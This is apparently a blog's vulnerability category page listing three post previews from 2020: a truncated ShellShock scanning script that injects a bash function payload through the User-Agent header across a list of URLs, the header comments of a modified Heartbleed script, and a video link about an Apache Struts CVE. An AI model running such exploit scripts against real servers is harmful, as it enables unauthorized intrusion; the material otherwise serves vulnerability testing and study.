2. Information Security/5. Vulnerabilities (3) 3. CVE-2014-6271 (ShellShock) #Title: Shell Shock Auto Exploitation Script # Author: Rafay Baloch import requests,sys if (len(sys.argv) < 2): print "Usage: shocktest.py file.txt" exit(0) def main(): file = sys.argv[1] with open(file) as f: file = f.read().splitlines() for url in file: cmd="() { test;};/bin/nopatchobfu" headers = {'user-agent': cmd} r=requests.get(url, headers=headers) if r.status_code == 500: print url,"is V.. 2020. 6. 9. 2. CVE-2014-0160 (Heartbleed) #!/usr/bin/python # Modified by Travis Lee # Last Updated: 4/21/14 # Version 1.16 # # -changed output to display text only instead of hexdump and made it easier to read # -added option to specify number of times to connect to server (to get more data) # -added option to send STARTTLS command for use with SMTP/POP/IMAP/FTP/etc... # -added option to specify an input file of multiple hosts, line de.. 2020. 6. 9. 1. CVE-2017-1278 (Apache Struts) www.youtube.com/watch?v=-A2p_94Jwso 2020. 6. 9. 이전 1 다음